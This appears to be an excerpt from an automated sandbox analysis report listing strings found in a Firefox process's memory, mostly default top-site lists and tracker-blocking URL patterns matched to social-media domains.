https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: #https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: #https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000034.00000002.2928082132.000001EB35803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: #https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://connect.facebook.net/*/all.js*FileUtils_openSafeFileOutputStream*://pub.doubleverify.com/signals/pub.js*webcompat-reporter%40mozilla.org:1.5.1resource://gre/modules/FileUtils.sys.mjs*://cdn.branch.io/branch-latest.min.js*FileUtils_closeAtomicFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.jsFileUtils_openAtomicFileOutputStream*://auth.9c9media.ca/auth/main.js@mozilla.org/network/safe-file-output-stream;1*://static.chartbeat.com/js/chartbeat.js*://*.imgur.com/js/vendor.*.bundle.js*://www.everestjs.net/static/st.v3.js*webcompat-reporter@mozilla.org.xpiFileUtils_closeSafeFileOutputStream@mozilla.org/addons/addon-manager-startup;1*://static.chartbeat.com/js/chartbeat_video.jsresource://gre/modules/addons/XPIProvider.jsm*://www.rva311.com/static/js/main.*.chunk.jspictureinpicture%40mozilla.org:1.0.0*://web-assets.toggl.com/app/assets/scripts/*.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://securepubads.g.doubleclick.net/gampad/*xml_vmap1**://id.rambler.ru/rambler-id-helper/auth_events.js*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js**://tpc.googlesyndication.com/safeframe/*/html/container.htmlcolor-mix(in srgb, currentColor 25%, transparent)*://securepubads.g.doubleclick.net/tag/js/gpt.js**://www.gstatic.com/firebasejs/*/firebase-messaging.js*https://static.adsafeprotected.com/firefox-etp-pixelresource://gre/modules/GeckoViewWebExtension.sys.mjs equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://track.adform.net/Serving/TrackPoint/**://securepubads.g.doubleclick.net/gampad/*ad**://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/*/imp/**://*.adsafeprotected.com/jsvid?*@mozilla.org/addons/content-policy;1 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E063000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E015000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2955908443.000001EB392D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E0A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000003.2851918874.000001EB369E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2942571768.000001EB378C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB39583000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000034.00000002.2941979451.000001EB3760B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: browser.fixup.dns_first_for_single_words^([a-z+.-]+:\/{0,3})*([^\/@]+@).+@mozilla.org/uriloader/handler-service;1^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)Failed to listen. Listener already attached.resource://devtools/shared/security/socket.jsdevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.js^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?browser.urlbar.dnsResolveFullyQualifiedNamesget FIXUP_FLAG_FORCE_ALTERNATE_URIGot invalid request to save JSON dataDevTools telemetry entry point failed: DevToolsStartup.jsm:handleDebuggerFlagUnable to start devtools server on Failed to listen. Callback argument missing.Failed to execute WebChannel callback:WebChannel/this._originCheckCallback@mozilla.org/dom/slow-script-debug;1browser.fixup.domainsuffixwhitelist.devtools.performance.recording.ui-base-urlreleaseDistinctSystemPrincipalLoaderdevtools/client/framework/devtoolsdevtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}@mozilla.org/uriloader/local-handler-app;1gecko.handlerService.defaultHandlersVersion@mozilla.org/uriloader/dbus-handler-app;1_finalizeInternal/this._finalizePromise<resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/DeferredTask.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/JSONFile.sys.mjs_injectDefaultProtocolHandlersIfNeededhttp://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%sextension/default-theme@mozilla.org/extendedDataisDownloadsImprovementsAlreadyMigratedhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%sScheme should be either http or httpshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol<http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/FileUtils.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1resource://gre/modules/NetUtil.sys.mjsresource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/file-input-stream;1{33d75835-722f-42c0-89cc-44f328e56a86}Can't invoke URIFixup in the content processMust have a source and a callback@mozilla.org/network/simple-stream-listener;1First argument should be an nsIInputStream@mozilla.org/network/input-stream-pump;1@mozilla.org/scriptableinputstream;1Non-zero amount of bytes must be specifiedhttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/intl/converter-input-stream;1https://mail.inbox.lv/compose?to=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yandex.ru/compose?mailto=%shttps://poczta.interia.pl/mh/?mailto=%snewChannel requires a single object argumentpdfjs.previousHandler.preferredActionpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLVALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.or
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg*://track.adform.net/serving/scripts/trackpoint/https://smartblock.firefox.etp/play.svg*://static.criteo.net/js/ld/publishertag.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js*@mozilla.org/network/file-output-stream;1@mozilla.org/network/atomic-file-output-stream;1*://*.imgur.io/js/vendor.*.bundle.js*://www.google-analytics.com/plugins/ua/ec.js*://s0.2mdn.net/instream/html5/ima3.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://s.webtrends.com/js/advancedLinkTracking.js*://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E0A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E063000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E015000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2955908443.000001EB392D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2969544005.000001EB3E0A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
